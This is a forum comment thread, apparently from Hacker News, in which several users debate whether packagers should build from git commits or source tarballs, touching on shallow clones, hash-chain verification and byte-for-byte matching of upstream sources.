← Back to context

Comment by LtWorf

1 day ago

To get a specific commit from a repo you need to clone usually, which will involve a much bigger download than just downloading your tar file.

5 comments

LtWorf

Reply
amluto  1 day ago

Shallow clones are a thing. And it’s fairly straightforward to create a tarball that includes enough hashes to verify the hash chain all the way to the commit hash. (In fact, I once kludged that up several years ago, and maybe I should dust it off. The tarball extracted just like a regular tarball but had all the git objects needed hiding inside in a way that tar would ignore.)

  • zahlman  1 day ago

    I don't actually see why you'd need to verify the hash chain anyway. The point of a source tarball, as I understand it, is to be sure of what source you're building, and to be able to audit that source. The development path would seem to be the developer's concern, not the maintainer's.

    • amluto  20 hours ago

      > The point of a source tarball, as I understand it, is to be sure of what source you're building

      Perhaps, in the rather narrow sense that you can download a Fedora source tarball and look inside yourself.

      My claim is that upstream developers produce actual official outputs: git commits and sometimes release tarballs. (But note that release tarballs on GitHub are often a mess and not really desired by the developer.). And I further think that verification that a system like Fedora or Debian or PyPI is building from correct sources should involve byte-for-byte comparison of the source tree and that, at least in the common case, there should be no opportunity for a user of one of these systems to upload sources that do not match the claimed upstream sources.

      The sadly common workflow where a packager clones a source tree, runs some scripts, and uploads the result as a “source tarball” is, IMO, wrong.

  • LtWorf  1 day ago

    of the head, or of any commit?

    • amluto  1 day ago

      I’m not sure why this would make a difference. The only thing special about the head is that there is a little file (that is not, itself, versioned) saying that a particular commit is the head.